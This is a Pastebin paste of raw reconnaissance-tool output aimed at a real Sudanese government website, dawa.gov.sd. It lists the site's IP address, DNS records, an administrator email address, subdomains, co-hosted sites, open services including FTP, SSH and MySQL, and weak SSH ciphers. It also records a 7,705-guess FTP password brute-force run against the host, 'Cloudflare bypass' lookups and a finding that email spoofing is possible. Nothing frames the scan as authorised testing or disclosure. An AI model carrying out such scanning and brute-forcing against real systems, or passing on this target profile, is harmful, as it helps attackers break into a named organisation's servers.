Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- =======================================================================================================================================
- Hostname dawa.gov.sd ISP Leaseweb Deutschland GmbH
- Continent Europe Flag
- DE
- Country Germany Country Code DE
- Region Unknown Local time 02 May 2019 12:16 CEST
- City Unknown Postal Code Unknown
- IP Address 37.58.63.157 Latitude 51.299
- Longitude 9.491
- =======================================================================================================================================
- #######################################################################################################################################
- > dawa.gov.sd
- Server: 38.132.106.139
- Address: 38.132.106.139#53
- Non-authoritative answer:
- Name: dawa.gov.sd
- Address: 37.58.63.157
- >
- #######################################################################################################################################
- [i] Scanning Site: http://dawa.gov.sd
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: المجلس الأعلى للدعوة والإرشاد
- [+] IP address: 37.58.63.157
- [+] Web Server: Could Not Detect
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 37.58.63.157
- [i] Country: Germany
- [i] State:
- [i] City:
- [i] Latitude: 51.2993
- [i] Longitude: 9.491
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Thu, 02 May 2019 10:37:49 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] X-Powered-By: PHP/7.0.33
- [i] Vary: Accept-Encoding,Cookie
- [i] Cache-Control: max-age=3, must-revalidate
- [i] X-Cache-Status: STALE
- [i] X-Powered-By: PleskLin
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- dawa.gov.sd. 21599 IN MX 10 mail.dawa.gov.sd.
- dawa.gov.sd. 21599 IN TXT "v=spf1 +a +mx -all +a:server.sdserverweb"
- dawa.gov.sd. 21599 IN A 37.58.63.157
- dawa.gov.sd. 21599 IN SOA ns1.dawa.gov.sd. aomer1529.gmail.com. 2019041801 10800 3600 604800 10800
- dawa.gov.sd. 21599 IN NS ns1.dawa.gov.sd.
- dawa.gov.sd. 21599 IN NS ns2.dawa.gov.sd.
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 37.58.63.157
- Network = 37.58.63.157 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 37.58.63.157 - 37.58.63.157 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 10:37 UTC
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.086s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 2
- [+] Subdomain: ns2.dawa.gov.sd
- [-] IP: 37.58.63.157
- [+] Subdomain: mail.dawa.gov.sd
- [-] IP: 37.58.63.157
- #######################################################################################################################################
- [?] Enter the target: example( http://domain.com )
- http://dawa.gov.sd/
- [!] IP Address : 37.58.63.157
- [!] dawa.gov.sd doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for dawa.gov.sd
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/dawa.gov.sd
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
- --------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns2.dawa.gov.sd. (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- ns1.dawa.gov.sd. (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- [+] MX Records
- 10 (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- [+] Host Records (A)
- ns1.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- ns2.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- mail.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
- [+] TXT Records
- "v=spf1 +a +mx -all +a:server.sdserverweb"
- [+] DNS Map: https://dnsdumpster.com/static/map/dawa.gov.sd.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 37.58.63.157:www.dawa.gov.sd
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- 37.58.63.157 aoif.gov.sd
- 37.58.63.157 alfaezontour.com
- 37.58.63.157 ahmedsaeedlawfirm.com
- 37.58.63.157 haloob-sd.com
- 37.58.63.157 dawa.gov.sd
- 37.58.63.157 www.dawa.gov.sd
- #######################################################################################################################################
- Enter Address Website = dawa.gov.sd
- Reversing IP With HackTarget 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] afrabia.org
- [+] alfaezontour.com
- [+] aoif.gov.sd
- [+] dawa.gov.sd
- [+] haloob-sd.com
- [+] mail.afrabia.org
- [+] mail.alfaezontour.com
- [+] mail.aoif.gov.sd
- [+] mail.dawa.gov.sd
- [+] mail.haloob-sd.com
- [+] mta-sts.mail.afrabia.org
- [+] mta-sts.mail.alfaezontour.com
- [+] mta-sts.mail.haloob-sd.com
- [+] ns1.aoif.gov.sd
- [+] ns1.dawa.gov.sd
- [+] ns2.aoif.gov.sd
- [+] ns2.dawa.gov.sd
- #######################################################################################################################################
- Reverse IP With YouGetSignal 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [*] IP: 37.58.63.157
- [*] Domain: dawa.gov.sd
- [*] Total Domains: 1
- [+] dawa.gov.sd
- #######################################################################################################################################
- Geo IP Lookup 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] IP Address: 37.58.63.157
- [+] Country: Germany
- [+] State:
- [+] City:
- [+] Latitude: 51.2993
- [+] Longitude: 9.491
- ######################################################################################################################################
- Bypass Cloudflare 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [!] CloudFlare Bypass 37.58.63.157 | ftp.dawa.gov.sd
- [!] CloudFlare Bypass 37.58.63.157 | webmail.dawa.gov.sd
- [!] CloudFlare Bypass 37.58.63.157 | mail.dawa.gov.sd
- [!] CloudFlare Bypass 37.58.63.157 | www.dawa.gov.sd
- [!] CloudFlare Bypass 37.58.63.157 | ns1.dawa.gov.sd
- [!] CloudFlare Bypass 37.58.63.157 | ns2.dawa.gov.sd
- #######################################################################################################################################
- DNS Lookup 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] dawa.gov.sd. 21599 IN MX 10 mail.dawa.gov.sd.
- [+] dawa.gov.sd. 21599 IN TXT "v=spf1 +a +mx -all +a:server.sdserverweb"
- [+] dawa.gov.sd. 21599 IN A 37.58.63.157
- [+] dawa.gov.sd. 21599 IN SOA ns1.dawa.gov.sd. aomer1529.gmail.com. 2019041801 10800 3600 604800 10800
- [+] dawa.gov.sd. 21599 IN NS ns1.dawa.gov.sd.
- [+] dawa.gov.sd. 21599 IN NS ns2.dawa.gov.sd.
- #######################################################################################################################################
- Show HTTP Header 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] HTTP/1.1 200 OK
- [+] Server: nginx
- [+] Date: Thu, 02 May 2019 10:37:34 GMT
- [+] Content-Type: text/html; charset=UTF-8
- [+] Connection: keep-alive
- [+] X-Powered-By: PHP/7.0.33
- [+] Vary: Accept-Encoding,Cookie
- [+] Link: ; rel="https://api.w.org/", ; rel=shortlink
- [+] X-Cache-Status: MISS
- [+] X-Powered-By: PleskLin
- #######################################################################################################################################
- Port Scan 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 10:37 UTC
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.086s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
- #######################################################################################################################################
- Traceroute 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Start: 2019-05-02T10:37:47+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 0.8 0.9 0.8 1.0 0.1
- 2.|-- 45.79.12.6 0.0% 3 0.5 0.8 0.5 1.5 0.6
- 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.5 0.9 2.6 0.9
- 4.|-- atl-b22-link.telia.net 0.0% 3 19.5 19.8 19.5 20.0 0.3
- 5.|-- ash-bb4-link.telia.net 0.0% 3 142.3 143.0 142.3 144.3 1.1
- 6.|-- prs-bb3-link.telia.net 0.0% 3 141.7 141.8 141.7 141.9 0.1
- 7.|-- ffm-bb3-link.telia.net 0.0% 3 141.4 141.6 141.4 141.8 0.2
- 8.|-- ffm-b10-link.telia.net 0.0% 3 142.1 142.8 142.0 144.3 1.3
- 9.|-- leaseweb-ic-146206-ffm-b10.c.telia.net 0.0% 3 134.9 135.1 134.8 135.5 0.4
- 10.|-- po-6.ce02.fra-10.de.leaseweb.net 0.0% 3 134.3 134.5 134.3 134.6 0.2
- 11.|-- hosted-by.leaseweb.com 0.0% 3 137.1 137.7 135.0 141.0 3.0
- 12.|-- 37.58.63.157 0.0% 3 134.5 134.5 134.4 134.8 0.2
- #######################################################################################################################################
- Ping 'dawa.gov.sd'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Starting Nping 0.7.70 ( https://nmap.org/nping ) at 2019-05-02 10:38 UTC
- SENT (0.1695s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=1] IP [ttl=64 id=59325 iplen=28 ]
- RCVD (0.3694s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=1] IP [ttl=57 id=24490 iplen=28 ]
- SENT (1.1697s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=3] IP [ttl=64 id=59325 iplen=28 ]
- RCVD (1.3894s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=3] IP [ttl=57 id=24550 iplen=28 ]
- SENT (2.1716s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=3] IP [ttl=64 id=59325 iplen=28 ]
- RCVD (2.4094s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=3] IP [ttl=57 id=25092 iplen=28 ]
- SENT (3.1734s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=4] IP [ttl=64 id=59325 iplen=28 ]
- RCVD (3.4297s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=4] IP [ttl=57 id=25620 iplen=28 ]
- Max rtt: 256.401ms | Min rtt: 199.928ms | Avg rtt: 228.422ms
- Raw packets sent: 4 (112B) | Rcvd: 4 (184B) | Lost: 0 (0.00%)
- Nping done: 1 IP address pinged in 3.43 seconds
- #######################################################################################################################################
- =======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: humbedooh@apache.org
- | [+] E-mail Found: m@tidakada.com
- | [+] E-mail Found: kevinh@kevcom.com
- | [+] E-mail Found: mike@hyperreal.org
- =======================================================================================================================================
- | External hosts:
- | [+] External Host Found: http://httpd.apache.org
- | [+] External Host Found: http://html5shiv.googlecode.com
- | [+] External Host Found: https://planet.wordpress.org
- | [+] External Host Found: https://developer.wordpress.org
- | [+] External Host Found: http://maps.google.com
- | [+] External Host Found: https://wordpress.org
- | [+] External Host Found: https://httpd.apache.org
- | [+] External Host Found: https://codex.wordpress.org
- | [+] External Host Found: https://www.mysql.com
- | [+] External Host Found: https://secure.php.net
- =======================================================================================================================================
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P4-3-Debian <<>> dawa.gov.sd
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20267
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;dawa.gov.sd. IN A
- ;; ANSWER SECTION:
- dawa.gov.sd. 83544 IN A 37.58.63.157
- ;; Query time: 45 msec
- ;; SERVER: 38.132.106.139#53(38.132.106.139)
- ;; WHEN: jeu mai 02 07:25:06 EDT 2019
- ;; MSG SIZE rcvd: 56
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P4-3-Debian <<>> +trace dawa.gov.sd
- ;; global options: +cmd
- . 79994 IN NS e.root-servers.net.
- . 79994 IN NS d.root-servers.net.
- . 79994 IN NS a.root-servers.net.
- . 79994 IN NS j.root-servers.net.
- . 79994 IN NS h.root-servers.net.
- . 79994 IN NS b.root-servers.net.
- . 79994 IN NS i.root-servers.net.
- . 79994 IN NS g.root-servers.net.
- . 79994 IN NS c.root-servers.net.
- . 79994 IN NS l.root-servers.net.
- . 79994 IN NS m.root-servers.net.
- . 79994 IN NS f.root-servers.net.
- . 79994 IN NS k.root-servers.net.
- . 79994 IN RRSIG NS 8 0 518400 20190515050000 20190502040000 25266 . 2rLhHAah0uVLpouEAndHvtO3EjI5CwqZ8/K187iZR6NGs+qOxsp2cPXP PmBoRmtsikSbGkEKwqS3DUE7Q15e0iFQGZ3BUSkOviEO4JHDN3R4RKmC XwV4qcrvW9wkfjiK1hUN9GF2OUQxcw6PUH34EM3LDGyZDkcOk6RC0ebA j/gcUMuEr3gFEdenjZ9fTOa0rmNf6m/QiOBJDRp9noDFUbdjElOVp6bA 8GKfXYPeZh1a86CZOIfnqW3kIKo1xSRgWGkSTnadp3YU2t1D+vQeFB3Y T3w9+PyKv02Owkh78LmKyg566izJG39qGQFpFAhcLRXpwQyfLHsCBtBK Z3bcRg==
- ;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 32 ms
- sd. 172800 IN NS sd.cctld.authdns.ripe.net.
- sd. 172800 IN NS ns1.uaenic.ae.
- sd. 172800 IN NS ns2.uaenic.ae.
- sd. 172800 IN NS ans1.sis.sd.
- sd. 172800 IN NS ans1.canar.sd.
- sd. 172800 IN NS ans2.canar.sd.
- sd. 172800 IN NS ns-sd.afrinic.net.
- sd. 86400 IN NSEC se. NS RRSIG NSEC
- sd. 86400 IN RRSIG NSEC 8 1 86400 20190515050000 20190502040000 25266 . g+harqZ1tGQpilhEPl6sCmANi9/nyvD6Ke4T9JiQaw5FUJ5UxMvalm8N J7Eh+bpvaOiMaVItikaiaYW9FrztnxGYcPe8WAo00ONsYoLJ0ldU8V4F fOOdfE3PEXnXLgSAKw1qwtbPYm+xnhbMc/yXP+jgWnwZi5MTxpkws+Ms aFFBcJxflSejbjymO+XwZB+Ee+hRdgwq1k+aIMxuDVOhcFUKGrA2bX0g 9ba/4YsfNi8vapW9941p/yrZMgY89xlY4XSraAsLM2o62Egi9i4XNqPS gIplVnuJxKUdwgISP71FT5Hv3SemlddjNG1mEYium3yYe8SF3TtqViD+ t2ENkg==
- ;; Received 698 bytes from 199.7.91.13#53(d.root-servers.net) in 36 ms
- ;; Received 68 bytes from 213.42.0.226#53(ns1.uaenic.ae) in 221 ms
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: dawa.gov.sd
- [-] DNSSEC is not configured for dawa.gov.sd
- [*] SOA ns1.dawa.gov.sd 37.58.63.157
- [*] NS ns1.dawa.gov.sd 37.58.63.157
- [*] Bind Version for 37.58.63.157 none
- [*] NS ns2.dawa.gov.sd 37.58.63.157
- [*] Bind Version for 37.58.63.157 none
- [*] MX mail.dawa.gov.sd 37.58.63.157
- [*] A dawa.gov.sd 37.58.63.157
- [*] TXT dawa.gov.sd v=spf1 +a +mx -all +a:server.sdserverweb
- [*] Enumerating SRV Records
- [-] No SRV Records Found for dawa.gov.sd
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain dawa.gov.sd
- [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
- [+] Getting nameservers
- 37.58.63.157 - ns1.dawa.gov.sd
- 37.58.63.157 - ns2.dawa.gov.sd
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 +a +mx -all +a:server.sdserverweb"
- [+] MX records found, added to target list
- 10 mail.dawa.gov.sd.
- [*] Scanning dawa.gov.sd for A records
- 37.58.63.157 - dawa.gov.sd
- 37.58.63.157 - ftp.dawa.gov.sd
- 37.58.63.157 - ipv4.dawa.gov.sd
- 37.58.63.157 - mail.dawa.gov.sd
- 37.58.63.157 - ns1.dawa.gov.sd
- 37.58.63.157 - ns2.dawa.gov.sd
- 37.58.63.157 - webmail.dawa.gov.sd
- 37.58.63.157 - www.dawa.gov.sd
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 37.58.63.157 403 alias ftp.dawa.gov.sd
- 37.58.63.157 403 host dawa.gov.sd
- 37.58.63.157 403 host mail.dawa.gov.sd
- 37.58.63.157 403 host ns1.dawa.gov.sd
- 37.58.63.157 403 host ns2.dawa.gov.sd
- 37.58.63.157 200 host webmail.dawa.gov.sd
- 37.58.63.157 403 alias www.dawa.gov.sd
- 37.58.63.157 403 host dawa.gov.sd #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- dawa.gov.sd -----
- Host's addresses:
- __________________
- dawa.gov.sd. 84452 IN A 37.58.63.157
- Name Servers:
- ______________
- ns2.dawa.gov.sd. 85816 IN A 37.58.63.157
- ns1.dawa.gov.sd. 85816 IN A 37.58.63.157
- Mail (MX) Servers:
- ___________________
- mail.dawa.gov.sd. 85815 IN A 37.58.63.157
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for dawa.gov.sd on ns2.dawa.gov.sd ...
- Trying Zone Transfer for dawa.gov.sd on ns1.dawa.gov.sd ...
- brute force file not specified, bay.
- #######################################################################################################################################
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for dawa.gov.sd
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- DNSdumpster: ns1.dawa.gov.sd
- DNSdumpster: ns2.dawa.gov.sd
- DNSdumpster: mail.dawa.gov.sd
- Yahoo: www.dawa.gov.sd
- [-] Saving results to file: /usr/share/sniper/loot//domains/domains-dawa.gov.sd.txt
- [-] Total Unique Subdomains Found: 4
- www.dawa.gov.sd
- mail.dawa.gov.sd
- ns1.dawa.gov.sd
- ns2.dawa.gov.sd
- #######################################################################################################################################
- dawa.gov.sd 37.58.63.157
- mail.dawa.gov.sd 37.58.63.157
- ns1.dawa.gov.sd 37.58.63.157
- ns2.dawa.gov.sd 37.58.63.157
- webmail.dawa.gov.sd 37.58.63.157
- ftp.dawa.gov.sd 37.58.63.157
- www.dawa.gov.sd 37.58.63.157
- #######################################################################################################################################
- ===============================================
- -=Subfinder v1.1.3 github.com/subfinder/subfinder
- ===============================================
- Running Source: Ask
- Running Source: Archive.is
- Running Source: Baidu
- Running Source: Bing
- Running Source: CertDB
- Running Source: CertificateTransparency
- Running Source: Certspotter
- Running Source: Commoncrawl
- Running Source: Crt.sh
- Running Source: Dnsdb
- Running Source: DNSDumpster
- Running Source: DNSTable
- Running Source: Dogpile
- Running Source: Exalead
- Running Source: Findsubdomains
- Running Source: Googleter
- Running Source: Hackertarget
- Running Source: Ipv4Info
- Running Source: PTRArchive
- Running Source: Sitedossier
- Running Source: Threatcrowd
- Running Source: ThreatMiner
- Running Source: WaybackArchive
- Running Source: Yahoo
- Running enumeration on dawa.gov.sd
- dnsdb: Unexpected return status 503
- dogpile: Get https://www.dogpile.com/search/web?q=dawa.gov.sd&qsi=1: EOF
- waybackarchive: parse http://web.archive.org/cdx/search/cdx?url=*.dawa.gov.sd/*&output=json&fl=original&collapse=urlkey&page=: net/url: invalid control character in URL
- archiveis: Get https://archive.fo/*.dawa.gov.sd: dial tcp 51.38.113.224:443: connect: connection timed out
- Starting Bruteforcing of dawa.gov.sd with 9985 words
- Total 12 Unique subdomains found for dawa.gov.sd
- .dawa.gov.sd
- ftp.dawa.gov.sd
- ipv4.dawa.gov.sd
- mail.dawa.gov.sd
- mail.dawa.gov.sd
- ns1.dawa.gov.sd
- ns1.dawa.gov.sd
- ns2.dawa.gov.sd
- ns2.dawa.gov.sd
- webmail.dawa.gov.sd
- www.dawa.gov.sd
- www.dawa.gov.sd
- #######################################################################################################################################
- [*] Processing domain dawa.gov.sd
- [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
- [+] Getting nameservers
- 37.58.63.157 - ns1.dawa.gov.sd
- 37.58.63.157 - ns2.dawa.gov.sd
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 +a +mx -all +a:server.sdserverweb"
- [+] MX records found, added to target list
- 10 mail.dawa.gov.sd.
- [*] Scanning dawa.gov.sd for A records
- 37.58.63.157 - dawa.gov.sd
- 37.58.63.157 - ftp.dawa.gov.sd
- 37.58.63.157 - mail.dawa.gov.sd
- 37.58.63.157 - ns1.dawa.gov.sd
- 37.58.63.157 - ns2.dawa.gov.sd
- 37.58.63.157 - webmail.dawa.gov.sd
- 37.58.63.157 - www.dawa.gov.sd
- #######################################################################################################################################
- [*] Found SPF record:
- [*] v=spf1 +a +mx -all +a:server.sdserverweb
- [*] SPF record contains an All item: -all
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for dawa.gov.sd!
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.12s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 7080/tcp open empowerid
- 8443/tcp open https-alt
- 8880/tcp open cddbp-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.086s latency).
- Not shown: 9 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- 68/udp open|filtered dhcpc
- 139/udp open|filtered netbios-ssn
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
- Nmap scan report for dawa.gov.sd (37.58.63.157)
- Host is up (0.10s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 7705 guesses in 236 seconds, average tps: 30.6
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.10 - 4.11 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.16 - 4.6 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 14 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 24.38 ms 10.246.200.1
- 2 22.95 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 27.58 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
- 4 23.60 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 21.24 ms motl-b1-link.telia.net (62.115.162.41)
- 6 ...
- 7 119.03 ms ldn-bb3-link.telia.net (62.115.113.21)
- 8 118.67 ms prs-bb3-link.telia.net (62.115.134.92)
- 9 118.66 ms ffm-bb3-link.telia.net (62.115.123.12)
- 10 118.18 ms ffm-b10-link.telia.net (62.115.137.211)
- 11 113.87 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
- 12 112.68 ms po-6.ce01.fra-10.de.leaseweb.net (178.162.223.155)
- 13 116.23 ms hosted-by.leaseweb.com (46.165.226.255)
- 14 112.97 ms 37.58.63.157
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
